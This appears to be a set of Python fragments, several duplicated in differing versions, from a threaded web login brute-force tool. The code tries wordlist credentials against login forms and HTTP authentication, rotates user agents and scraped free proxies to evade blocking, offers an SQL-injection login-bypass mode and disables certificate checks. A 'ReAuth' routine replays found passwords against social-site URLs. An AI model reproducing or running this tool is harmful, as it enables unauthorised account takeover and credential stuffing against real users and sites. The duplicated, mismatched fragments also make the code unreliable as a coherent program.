def parseFormInfo(optionURL): ###################################### # Test connect to URL # Fetch login field # TODO print ONLY ONE status message # ##################################### try: process = tbrowser.startBrowser() user_agent = tbrowser.useragent() process.addheaders = [('User-Agent', user_agent)] process.open(optionURL) #utils.printf("Connected. Getting form information...", "good") formLoginID, formUserfield, formPasswdfield = tbrowser.getLoginForm( process.forms()) #utils.printf("Found login form", "good") return formLoginID, formUserfield, formPasswdfield except TypeError as error: #utils.printf("Can not find login form", "bad") #sys.exit(1) utils.die("Can not find login form", error) except Exception as error: #utils.printf(error, "bad") utils.die("Checking connection error", error) finally: process.close()
def submit(options, loginInfo, creds, result): tryPassword, tryUsername = creds realm = loginInfo[0] for cred in list(result.queue): if tryUsername == cred[0]: return True # don't run if find password of username if options.verbose: printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm') try: proc = startBrowser(options.timeout) proc.add_password(options.url, tryUsername, tryPassword, realm) proc.open(options.url) try: proc.open(options.url) # printf("[*] Page title: ['%s']" %(proc.title()), "good") printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()), "good") result.put([options.url, tryUsername, tryPassword]) # printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good") except Exception as err: try: if err.code == 401: if options.verbose: printf("[-] Failed %s" % (creds[::-1]), "bad") else: printf("[x] %s: %s" % (err, creds[::-1]), "bad") except: die("[x] HTTP GET:", err) except: if options.verbose: printf("[x] Failed!", "bad")
def check(target="https://google.com"): # Single thread try: proxylist = actions.fload(PROXY_PATH) #actions.fwrite(TMP_PATH, "") # create new empty list workers = [] for i in xrange(THREADS): worker = threading.Thread(target=checkAllProxy, args=( proxylist, target, )) workers.append(worker) for worker in workers: worker.daemon = True worker.start() except KeyboardInterrupt as error: utils.die("Terminated by user!", error) except Exception as error: utils.die("Error while checking live proxy", error) finally: try: for worker in workers: worker.join() except: pass
def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response, re.MULTILINE) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: utils.die("Error while parsing proxy list.", error)
def main(URL, threads, verbose): try: import data save = "%s/liveproxy.txt" % (data.__path__[0]) getNewProxy(save) if URL: check(URL, threads, verbose, save) except Exception as err: utils.die("GetProxy: Error while running module", err)
def check_login(opts): try: proc = startBrowser(options.timeout) proc.open(opts.url) """ Check URL type. If Website directs to other URL, options.url is website's panel else: it is login url. Example: options.url = site.com/wp-admin/ -> panel site directs user to wp-login -> login URL options.url = site.com/wp-login.php -> login URL """ if proc.geturl() != opts.url: printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm") opts.panel_url, opts.login_url = opts.url, proc.geturl() else: opts.login_url = opts.url # printf("[*] Connect success!", "good") options.attack_mode = "--loginbrute" if opts.run_options["--verbose"]: printf("[*] %s" % (proc.title()), "norm") # printf("[+] Analyzing login form....") loginInfo = parseLoginForm(proc.forms()) return loginInfo except Exception as error: try: if error.code == 401: ## GET INFORMATION resp_header = str(proc.response().info()) if "WWW-Authenticate" in resp_header: loginID = checkHTTPGetLogin(resp_header) loginInfo = (loginID, ["Password", "User Name"]) if options.verbose: printf("[+] Using HTTP GET Authentication mode", "norm") options.attack_mode = "--httpget" else: loginInfo = False else: loginInfo = False printf("[x] Target check: %s" % (error), "bad") # Error != http code except: loginInfo = False die("[x] Target check:", error) except KeyboardInterrupt: loginInfo = False finally: proc.close() return loginInfo
def checProxyConnProvider(url="https://free-proxy-list.net/"): try: printf("[+] Getting proxy list from %s" % (url)) getproxy = startBrowser(options.timeout) getproxy.open(url) printf("[*] Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: die("[x] GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close()
def run(options, creds): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: if options.url in url: social_urls.remove(url) result = Queue() #workers = [] try: for tryCreds in creds: for url in social_urls: submit(url, options, tryCreds, result) # if len(workers) == options.threads: # do_job(workers) # del workers[:] # worker = threading.Thread( # target = submit, # args = (url, options, tryCreds, result) # ) #worker.daemon = True #workers.append(worker) #do_job(workers) #del workers[:] except KeyboardInterrupt: printf("[x] Terminated by user!", "bad") import os os._exit(0) except SystemExit: die("[x] Terminated by system!", "SystemExit") except Exception as err: die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if len(result) == 0: printf("[-] No extra valid password found", "bad") else: print_table(("Target", "Username", "Password"), *result)
def refresh(): try: listproxy = parse_proxy(get_proxy_list()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) utils.printf("Write data to %s." % (PROXY_PATH)) actions.fwrite(PROXY_PATH, listproxy) utils.printf("Write data to %s completed!" % (PROXY_PATH), "good") except Exception as error: utils.die("Error while writting proxy data", error)
def get_options(self): szOptions = len(sys.argv) if szOptions == 1: # NO ARGUMENT print_fast_help() printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS)) sys.exit(0) else: try: self.parse_options(szOptions) except Exception as error: die("[x] Options: Parse options error", error)
def checkOption(options, run_options): finalOption = {} global MODE, DEF_WORDLIST # Modify URL value to correct format # Read password list # Read userlist # Convert to int(threads) try: finalOption["threads"] = int(options["-t"]) if finalOption["threads"] < 1: utils.die("Argument error", "Threads must be > 1") except Exception as ConvertError: utils.die("Invalid threads", ConvertError) if MODE == "--sqli": finalOption["passlist"] = "MyP@ssW0rd" finalOption["userlist"] = data.getSQL() else: # WARNING eval() is called. It can be unsafe finalOption["passlist"] = eval( "data.%s_pass()" % (options["-p"])).replace( "\t", "") if options["-p"] in DEF_WORDLIST else actions.fread( options["-p"]) if options["-U"]: finalOption["userlist"] = actions.lread(options["-U"]) else: finalOption["userlist"] = eval( "data.%s_user()" % (options["-u"])).replace( "\t", "") if options["-u"] in DEF_WORDLIST else actions.fread( options["-u"]) finalOption["falsekey"] = options["-k"] if run_options["--proxy"]: try: import data run_options["--proxy"] = actions.fread( "%s/liveproxy.txt" % (data.__path__[0])).split("\n") except Exception as err: utils.printf("Argument error", err) return finalOption, run_options
def checProxyConnProvider(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: utils.die("GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close()
def get_proxy_list(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) # getproxy = mechanize.Browser() # getproxy.set_handle_robots(False) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxy completed.", "good") return getproxy.response().read() except Exception as error: utils.die("Error while connecting to live proxy server!", error) finally: getproxy.close()
def getNewProxy(PROXY_PATH): def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response, re.MULTILINE) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: utils.die("GetProxy: Error while parsing proxies.", error) def checProxyConnProvider(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: utils.die("GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close() try: listproxy = parse_proxy(checProxyConnProvider()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) utils.printf("Write data to %s." % (PROXY_PATH)) actions.fwrite(PROXY_PATH, listproxy) utils.printf("Write data to %s completed!" % (PROXY_PATH), "good") except Exception as error: utils.die("GetProxy: Error while writting data", error)
def checkOption(url, options, r_options): finalOption = {} global MODE # Modify URL value to correct format # Read password list # Read userlist # Convert to int(threads) try: finalOption["threads"] = int(options["-t"]) except Exception as ConvertError: utils.die("Invalid threads", ConvertError) if MODE == "--sqli": finalOption["passlist"] = "MyP@ssW0rd" finalOption["userlist"] = data.getSQL() else: finalOption["passlist"] = data.getPass( ) if options["-p"] == "default" else actions.fread(options["-p"]) if options["-U"]: finalOption["userlist"] = actions.lread(options["-U"]) else: finalOption["userlist"] = data.getUser( ) if options["-u"] == "default" else actions.fread(options["-u"]) finalOption["falsekey"] = options["-k"] if "http" not in url: url = "http://%s" % (url) if url[-1] != "/": url += "/" if r_options["--proxy"]: r_options["--proxy"] = actions.getProxyList() return url, finalOption, r_options
def getLoginForm(optionURL, browser, verbose): ###################################### # Test connect to URL # Fetch login field # ##################################### try: browser.open(optionURL) formLoginID, formUserfield, formPasswdfield = parseLoginForm( browser.forms()) if verbose: utils.printf("Found login form", "good") return formLoginID, formUserfield, formPasswdfield except TypeError as error: utils.die("Can not find login form", error) except Exception as error: utils.die("Checking connection error", error)
def getnew(options): def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response, re.MULTILINE) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: die("[x] GetProxy: Error while parsing proxies.", error) def checProxyConnProvider(url="https://free-proxy-list.net/"): try: printf("[+] Getting proxy list from %s" % (url)) getproxy = startBrowser(options.timeout) getproxy.open(url) printf("[*] Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: die("[x] GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close() try: listproxy = parse_proxy(checProxyConnProvider()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) printf("[*] Get %s proxies." % (len(listproxy)), "good") printf("[+] Saving to %s" % (PROXY_PATH)) fwrite(PROXY_PATH, listproxy) printf("[*] Data saved!", "good") except Exception as error: die("[x] GetProxy: Error while writting data", error)
def parse_options(self, szOptions): i = 1 while i < szOptions: if sys.argv[i] in self.HELP_OPTIONS: self.help = True elif sys.argv[i].startswith("--"): if sys.argv[i] in self.run_options.keys(): self.run_options[sys.argv[i]] = True elif sys.argv[i] in self.extra_mode: self.extras.append(sys.argv[i]) elif sys.argv[i] in self.ATTACK_MODES: self.attack_mode = sys.argv[i] elif sys.argv[i] == "--list": if sys.argv[i + 1] in self.WORDLISTS: self.options["-u"] = sys.argv[i + 1] self.options["-p"] = sys.argv[i + 1] i += 1 else: die( "[x] Options: Arguments error", "Invalid wordlist %s" %(sys.argv[i + 1]) ) elif sys.argv[i] in self.HELP_OPTIONS: self.help = True else: die( "[x] Options: Arguments error", "Unknow option %s" %(sys.argv[i]) ) elif sys.argv[i].startswith("-"): if sys.argv[i] in self.options.keys(): self.options[sys.argv[i]] = sys.argv[i + 1] i += 1 else: die( "[x] Options: Arguments error", "Unknow option %s" %(sys.argv[i]) ) else: self.url = sys.argv[i] i += 1
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: # BUG double_free() if checkedURL in url: social_urls.remove(url) result = Queue() workers = [] try: for tryCreds in creds: for url in social_urls: if actions.size_o(workers) == optionThreads: do_job(workers) del workers[:] worker = threading.Thread(target=submit, args=(url, tryCreds, optionProxy, optionVerbose, result)) worker.daemon = True workers.append(worker) do_job(workers) del workers[:] except KeyboardInterrupt: utils.die("[x] Terminated by user!", "KeyboardInterrupt") except SystemExit: utils.die("[x] Terminated by system!", "SystemExit") except Exception as err: utils.die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if actions.size_o(result) == 0: utils.printf("[-] No extra valid password found", "bad") else: utils.print_table(("Target", "Username", "Password"), *result)
def handle(optionURL, optionUserlist, optionPasslist, sizePasslist, setProxyList, setKeyFalse): ############################################ # Old code logic: # Create 1 browser object per password # Current: # Create 1 browser object per username # Pick 1 user agent per password try # ############################################ # Get login form field informations frmLoginID, frmUserfield, frmPassfield = parseFormInfo(optionURL) # Get single Username in username list / file for tryUsername in optionUserlist: # If tryUsername is file object, remove \n # tryUsername = tryUsername[:-1] tryUsername = tryUsername.replace('\n', '') try: optionPasslist.seek(0) except: pass ###### new test code block proc = tbrowser.startBrowser() # proc = mechanize.Browser() # proc.set_handle_robots(False) ###### idxTry = 0 for tryPassword in optionPasslist: # Get single Password, remove \n tryPassword = tryPassword.replace('\n', '') # New test code block: add new user_agent each try user_agent = tbrowser.useragent() proc.addheaders = [('User-Agent', user_agent)] #print "Debug: %s:%s" %(tryUsername, tryPassword) if setProxyList: #Set proxy connect proxyAddr = actions.randomFromList(setProxyList) #utils.printf("Debug: proxy addr %s" %(proxyAddr)) proc.set_proxies({"http": proxyAddr}) proc.open(optionURL) # End new code block try: idxTry += 1 # Select login form proc.select_form(nr=frmLoginID) proc.form[frmUserfield] = tryUsername proc.form[frmPassfield] = tryPassword # Print status bar utils.printp(tryUsername, idxTry, sizePasslist) # Send request proc.submit() # Reload - useful for redirect to dashboard proc.reload() # If no login form -> success # TODO improve condition to use captcha if not tbrowser.getLoginForm(proc.forms()): #TODO edit mixed condition if setKeyFalse: if setKeyFalse not in proc.response().read(): # Add creds to success list # If verbose: print printSuccess(tryUsername, tryPassword) # Clear object and try new username proc.close() break else: utils.printSuccess(tryUsername, tryPassword) # Clear object and try new username proc.close() break except mechanize.HTTPError as error: # Get blocked utils.die("Thread has been blocked", error) proc.close()
helps.print_help() else: create_tasks(options) if "--getproxy" in options.extras: getproxy.getnew(options) if not options.url: printf("[*] No URL provided! Get proxy only.", "good") sys.exit(0) else: if not options.run_options["--proxy"]: printf( "[-] WARNING!!! Program runs without proxy! Use \"--proxy\"!", "bad") if not options.target: die("[x] URL error", "An URL is required") else: # Fix SSL errors https://stackoverflow.com/a/35960702 try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context printf(start_banner(options)) results = []
report_name) reports.makeReport( utils.report_banner(optionURL, optionRunMode, optionProxy, optionThreads, credentials, report_name, runtime, IS_REGULAR), report_path) utils.printf("\n[*] Report file at:\n%s" % (report_path), "good") except Exception as err: utils.printf("[x] Error while creating report: %s" % (err), "bad") except Exception as err: utils.printf("\n[x] Error while getting result.\n", "bad") utils.printf(err, "bad") runtime = time.time() - timeStarting utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good") sys.exit(0) if __name__ == "__main__": try: main(*options.getUserOptions()) except Exception as err: utils.die("", err)
def main(optionURL, setOptions, optionRunMode, setRunOptions): def do_job(jobs): for job in jobs: job.start() utils.printp for job in jobs: job.join() import time, os, threading # CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER try: import mechanize, re, requests # for basichttpauthentication, not useless, use later except ImportError as err: utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1])) try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context try: from Queue import Queue except ImportError: from queue import Queue result = Queue() # BUG bad memory management optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values( ) optionProxy, optionReport, optionVerbose = setRunOptions.values() try: optionUserlist = optionUserlist.split("\n") except: pass try: optionPasslist = optionPasslist.split("\n") except: pass ## End of testing timeStarting = time.time() # get login form info # call brute IS_REGULAR = True # IF NOT HTTP BASIC AUTHENTICATION, CHECK RESULT AND PARSE LOGIN FORM proc = tbrowser.startBrowser() proc.addheaders = [('User-Agent', tbrowser.useragent())] if optionRunMode not in ["--httpauth"]: try: utils.printf("Checking connection...") proc.open(optionURL) #TODO PROXY utils.printf("[*] Connect success!", "good") loginInfo = tbrowser.parseLoginForm(proc.forms()) if not loginInfo: utils.die("[x] URL error", "No login field found") elif actions.size_o(loginInfo[1]) == 1: # Password checking only utils.printf("[*] Form with password field", "good") del optionUserlist[:] optionUserlist = [""] IS_REGULAR = False elif actions.size_o(loginInfo[1]) == 2: utils.printf("[*] Form username+password field", "good") except Exception as err: utils.die("[x] Can't connect to target", err) finally: proc.close() #### END OF CHECKING TARGET sizePasslist = actions.size_o(optionPasslist) sizeUserlist = actions.size_o(optionUserlist) workers = [] utils.printf("Starting attack....\nTask count: %s tasks" % (sizeUserlist * sizePasslist)) ############################ # Setting up threads ############################ try: for password in optionPasslist: for username in optionUserlist: username, password = username.replace("\n", ""), password.replace( "\n", "") #### # IF HAVE ENOUGH THREAD, DO IT ALL ### if actions.size_o(workers) == optionThreads: do_job(workers) del workers[:] if optionRunMode == "--brute": worker = threading.Thread( target=loginbrute.submit, args=(optionURL, [password, username ], optionProxy, optionKeyFalse, optionVerbose, loginInfo, result)) elif optionRunMode == "--httpauth": worker = threading.Thread(target=httpauth.submit, args=(optionURL, username, password, optionProxy, optionVerbose, result)) worker.daemon = True workers.append(worker) ######### END SETTING UP THREADS ################ #DO ALL LAST TASKs do_job(workers) del workers[:] ### CATCH ERRORS ### except KeyboardInterrupt: # as error: # TODO: kill running threads here utils.die("[x] Terminated by user!", "KeyboardInterrupt") except SystemExit: # as error utils.die("[x] Terminated by system!", "SystemExit") except Exception as error: utils.die("[x] Runtime error", error) ### ALL TASKS DONE #### finally: runtime = time.time() - timeStarting """ All threads have been set daemon Running threads should be stopped after main task done """ ############################################ # Get result # ############################################ try: credentials = list(result.queue) if actions.size_o(credentials) == 0: utils.printf("[-] No match found!", "bad") else: utils.printf( "\n[*] %s valid password[s] found:\n" % (actions.size_o(credentials)), "norm") if IS_REGULAR: utils.print_table(("Username", "Password"), *credentials) else: if optionRunMode != "--sqli": utils.print_table(("", "Password"), *credentials) else: utils.print_table(("Payload", ""), *credentials) # TODO: test more ### CREATE REPORT #### if optionReport: try: import reports optionProxy = "True" if optionProxy else "False" report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"), optionURL.split("/")[2]) report_path = "%s/%s.txt" % (reports.__path__[0], report_name) reports.makeReport( utils.report_banner(optionURL, optionRunMode, optionProxy, optionThreads, credentials, report_name, runtime, IS_REGULAR), report_path) utils.printf("\n[*] Report file at:\n%s" % (report_path), "good") except Exception as err: utils.printf("[x] Error while creating report: %s" % (err), "bad") except Exception as err: utils.printf("\n[x] Error while getting result.\n", "bad") utils.printf(err, "bad") utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good") sys.exit(0)
def getUserOptions(): global URL, MODE, r_options, DEF_WORDLIST # Default operation modes: # --brute: brute force # --sqli: sql injection bypass login (TODO) # --httpauth: http basic authentication DEF_R_MODE = ("--brute", "--sqli", "--httpauth") # Default running mode: # --verbose: display informations # --report: create task report # --proxy: Running using proxy # Default options: # -u: Read userlist from file # -p: Read passlit from file # -U: Read username / userlist directly from argument # -t: Number of threads using # -k: Set key for false condition (for special cases) # Default wordlist: default, router, unix, tomcat, cctv, mirai, http options = { "-u": "default", "-p": "default", "-t": 16, "-k": None, "-U": None, } GETPROXY = False ########### STARTING ################## if len(sys.argv) == 1: utils.print_help() sys.exit(0) idx = 1 while idx < len(sys.argv): if sys.argv[idx] in ("-h", "--help", "help"): utils.print_help() sys.exit(0) else: if sys.argv[idx][:2] == "--": if sys.argv[idx] in r_options.keys(): # --verbose", "--report", "--proxy" r_options[sys.argv[idx]] = True elif sys.argv[idx] in DEF_R_MODE: # "--brute", "--sqli", "--httpauth" MODE = sys.argv[idx] elif sys.argv[idx] == "--list": # Wordlist provided if sys.argv[idx + 1] in DEF_WORDLIST: options["-u"], options["-p"], idx = sys.argv[ idx + 1], sys.argv[idx + 1], idx + 1 else: utils.die("Error while parsing arguments", "Invalid wordlist %s" % (sys.argv[idx + 1])) elif sys.argv[idx] == "--getproxy": GETPROXY = True else: utils.die("Error while parsing arguments", "Invalid option %s" % (sys.argv[idx])) elif sys.argv[idx][:1] == "-": if sys.argv[idx] in options.keys(): # "-u", "-U", "-p", "-t", "-k" options[sys.argv[idx]], idx = sys.argv[idx + 1], idx + 1 else: utils.die("Error while parsing arguments", "Invalid option %s" % (sys.argv[idx])) else: URL = sys.argv[idx] idx += 1 URL = checkURL(URL) if GETPROXY: # TODO Auto brute using proxy after get new proxy # TODO New help banner from extras import getproxy try: threads = int(options["-t"]) except Exception as err: utils.die("GetProxy: Error while parsing arguments", err) getproxy.main(URL, threads, r_options["--verbose"]) # GET NEW PROXY LIST ONLY if not URL: sys.exit(0) # else: CHECK PROXY TO TARGET DONE, AUTO ATTACK? # r_options["--proxy"] == True if not URL: utils.die("Error while parsing arguments", "Invalid URL") utils.printf(utils.start_banner(URL, options, MODE, r_options), "good") options, r_options = checkOption(options, r_options) return URL, options, MODE, r_options
utils.printf("%s %s" % (proxyAddr, error), "bad") return None finally: try: proxyTest.close() except: pass if __name__ == "__main__": current_dir = actions.getRootDir(sys.argv[0]) if current_dir: os.chdir(current_dir) if len(sys.argv) == 1: help() elif len(sys.argv) == 2: option = sys.argv[1] if option in ["help", "--help", "-h"]: help() elif option == "get": refresh() elif option == "check": check() else: utils.die("Invalid options!", "Usage:\n\tpython getproxy.py help") elif len(sys.argv) == 3: option, value = sys.argv[1], sys.argv[2] if option == "check": check(value) else: utils.die("Invalid options!", "Usage:\n\tpython getproxy.py help")
def main(optionURL, setOptions, optionRunMode, setRunOptions): def do_job(jobs): for job in jobs: job.start() for job in jobs: job.join() import time, os, threading # CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER try: import mechanize, re, ssl, requests # for basichttpauthentication, not useless, use later except ImportError as err: utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1])) try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context try: from Queue import Queue except ImportError: from queue import Queue result = Queue() # BUG bad memory management optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values( ) optionProxy, optionReport, optionVerbose = setRunOptions.values() try: optionUserlist = optionUserlist.split("\n") except: #optionUserlist = optionUserlist.readlines() pass # TODO Must testing cases with list and file object try: optionPasslist = optionPasslist.split("\n") except: pass ## End of testing timeStarting = time.time() # get login form info # call brute sizePasslist = actions.size_o(optionPasslist) sizeUserlist = actions.size_o(optionUserlist) proc = tbrowser.startBrowser() proc.addheaders = [('User-Agent', tbrowser.useragent())] try: utils.printf("Checking connection...") proc.open(optionURL) #TODO PROXY loginInfo = tbrowser.getLoginForm(optionURL, proc, optionVerbose) utils.printf("Connect success!", "good") except Exception as err: utils.die("Error while parsing login form", err) finally: proc.close() utils.printf("Starting attack.... %s tasks" % (sizeUserlist * sizePasslist)) workers = [] trying = 0 try: for password in optionPasslist: for username in optionUserlist: if len(workers) == optionThreads: do_job(workers) del workers[:] if optionRunMode == "--brute": worker = threading.Thread( target=loginbrute.submit, args=(optionURL, username.replace("\n", ""), password.replace("\n", ""), sizeUserlist * sizePasslist, optionProxy, optionKeyFalse, optionVerbose, loginInfo, result)) worker.daemon = True workers.append(worker) #DO ALL LAST TASKs do_job(workers) del workers[:] except KeyboardInterrupt: # as error: # TODO: kill running threads here utils.die("Terminated by user!", "KeyboardInterrupt") except SystemExit: # as error utils.die("Terminated by system!", "SystemExit") except Exception as error: utils.die("Error while running", error) finally: runtime = time.time() - timeStarting """ All threads have been set daemon Running threads should be stopped after main task done """ ############################################ # Get result # ############################################ try: credentials = list(result.queue) if len(credentials) == 0: utils.printf("[-] No valid password found!", "bad") else: utils.printf( "\n[*] %s valid password[s] found:\n" % (len(credentials)), "norm") utils.print_table(("Username", "Password"), *credentials) if optionReport: try: import report optionProxy = "True" if optionProxy else "False" report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"), optionURL.split("/")[2]) report_path = "%s/%s.txt" % (reports.__path__[0], report_name) reports.makeReport( utils.report_banner(optionURL, optionRunMode, optionProxy, optionThreads, credentials, report_name, runtime), report_path) utils.printf("\n[*]Report file at:\n%s" % (report_path), "good") except Exception as err: utils.printf("Error while creating report: %s" % (err), "bad") except Exception as err: utils.printf("\nError while getting result.\n", "bad") utils.printf(err, "bad") utils.printf("\nCompleted. Run time: %0.5s [s]\n" % (runtime)) ######################################## # Clear resources # ######################################## try: optionPasslist.close() except: pass try: optionUserlist.close() except: pass sys.exit(0)
def check(target, threads, verbose, PROXY_PATH): def do_job(jobs): for job in jobs: job.start() for job in jobs: job.join() def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = tbrowser.startBrowser() user_agent = tbrowser.useragent() proxyTest.addheaders = [('User-Agent', user_agent)] proxyTest.set_proxies({"http": proxyAddr}) if verbose: utils.printf("Trying: %s" % (proxyAddr)) proxyTest.open(target) if verbose: utils.printf("Success: %s" % (proxyAddr), "good") result.put(proxyAddr) except Exception as error: if verbose: utils.printf("%s %s" % (proxyAddr, error), "bad") finally: try: proxyTest.close() except: pass try: proxylist = actions.fread(PROXY_PATH).split("\n") workers = [] result = Queue() for tryProxy in proxylist: if len(workers) == threads: do_job(workers) del workers[:] worker = threading.Thread(target=checProxyConn, args=(tryProxy, target, result, verbose)) worker.daemon = True workers.append(worker) do_job(workers) del workers[:] except KeyboardInterrupt as error: utils.die("GetProxy: Terminated by user!", error) except Exception as error: utils.die("GetProxy: Error while checking proxy connection to target", error) finally: try: utils.printf("GetProxy: Write working proxies") actions.fwrite(PROXY_PATH, "\n".join(list(result.queue))) utils.printf("Write working proxies completed", "good") except Exception as err: utils.die("GetProxy: Error while writing result", err)
def attack(options, loginInfo): def run_threads(threads, sending, completed, total): # Run threads for thread in threads: sending += 1 # Sending progress_bar(sending, completed, total) thread.start() # Wait for threads completed for thread in threads: completed += 1 progress_bar(sending, completed, total) thread.join() return sending, completed ### SETTING UP FOR NEW ATTACK ### if options.attack_mode == "--httpget": from modules import httpget attack_module = httpget.submit elif options.attack_mode == "--loginbrute": from modules import loginbrute attack_module = loginbrute.submit else: die("[x] Runtime error: Invalid attack mode", "%s" % (options.attack_mode)) if not loginInfo: # Test for 2 steps... login? die("[x] Target check: URL error", "[x] No login request found") else: if options.verbose: printf("[*] Login request has been found!", "good") tasks = len(options.passwd) * len(options.username) printf( "[+] [Tasks: %s] [ID: %s] [Controls: %s]" % (tasks, loginInfo[0], loginInfo[1][::-1]), "good") import Queue result = Queue.Queue() sending, completed = 0, 0 try: #### START ATTACK #### workers = [] for username in options.username: if "--upwd" in options.extras \ and username not in options.passwd \ and options.options["-p"] is not "sqli": options.passwd += (username, ) for password in options.passwd: if len(workers) == options.threads: sending, completed = run_threads(workers, sending, completed, tasks) del workers[:] worker = threading.Thread(target=attack_module, args=(options, loginInfo, [password, username], result)) workers.append(worker) worker.daemon = True sending, completed = run_threads(workers, sending, completed, tasks) del workers[:] except KeyboardInterrupt: printf("[x] Terminated by user!", "bad") global set_break set_break = True except SystemExit: printf("[x] Terminated by system!", "bad") except Exception as error: die("[x] Runtime error", error) finally: credentials = list(result.queue) if len(credentials) == 0: printf("[-] No match found!", "bad") else: printf("\n[*] %s valid password[s] found:" % (len(credentials)), "norm") if not credentials[0][1]: print_table(("URL", "Password"), *[creds[::2] for creds in credentials]) else: print_table(("Username", "Password"), *[creds[-2:] for creds in credentials]) printf("") return credentials
def check(options): def do_job(jobs): for job in jobs: job.start() for job in jobs: job.join() def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = startBrowser(options.timeout) proxyTest.set_proxies({"http": proxyAddr}) if verbose: printf("[+] Trying: %s" % (proxyAddr)) proxyTest.open(options.url) if verbose: printf("[*] Success: %s" % (proxyAddr), "good") result.put(proxyAddr) except Exception as error: if verbose: printf("[x] %s %s" % (proxyAddr, error), "bad") finally: try: proxyTest.close() except: pass try: proxylist = fread(PROXY_PATH).split("\n") workers = [] result = Queue() for tryProxy in proxylist: if len(workers) == options.threads: do_job(workers) del workers[:] worker = threading.Thread(target=checProxyConn, args=(tryProxy, options.url, result, options.verbose)) worker.daemon = True workers.append(worker) do_job(workers) del workers[:] except KeyboardInterrupt as error: printf("[x] Terminated by user!", "bad") import os os._exit(0) except Exception as error: die("[x] GetProxy: Error while checking proxy connection to target", error) finally: try: _data = "\n".join(list(result.queue)) printf("[*] Get %s proxies." % (len(_data)), "good") printf("[+] Write working proxies") fwrite(LIVE_PATH, _data) printf("[*] Write working proxies completed", "good") except Exception as err: die("[x] GetProxy: Error while writing result", err)
def main(setTargetURL, setOptions, setMode, setRunOptions): setUserlist, setNumberThreads, setKeyFalse, setPasslist = setOptions.values( ) setProxy, setVerbose, setLog = setRunOptions.values() try: sizePasslist = actions.size_o(setPasslist) sizeUserlist = actions.size_o(setUserlist) setUserlist = setUserlist.split("\n") setPasslist = setPasslist.split("\n") # TODO Check condition each case except: #utils.printf("Can not get size of passlist", "bad") pass timeStarting = time.time() workers = [] try: #lock = threading.Lock() #lock.acquire() # Create thread list #usePasslist = list(itertools.islice(setPasslist, sizePasslist)) #usePasslist = setPasslist.readlines() #TODO modify for sql injection mode if setMode == "--sqli": for i in xrange(setNumberThreads): worker = threading.Thread( target=sqltest.handle, args=(setTargetURL, setUserlist, setPasslist, sizeUserlist * sizePasslist, setProxy, setKeyFalse)) # add threads to list workers.append(worker) else: for i in xrange(setNumberThreads): worker = threading.Thread(target=httpbrute.handle, args=(setTargetURL, setUserlist, setPasslist.split("\n"), sizePasslist, setProxy, setKeyFalse)) # add threads to list workers.append(worker) except Exception as error: utils.die("Error while creating threads", error) # Start all threads try: for worker in workers: worker.daemon = True worker.start() #except (KeyboardInterrupt, SystemExit): except KeyboardInterrupt: # as error: # for worker in workers: # worker.join() utils.die("Terminated by user!", "KeyboardInterrupt") except SystemExit: # as error utils.die("Terminated by system!", 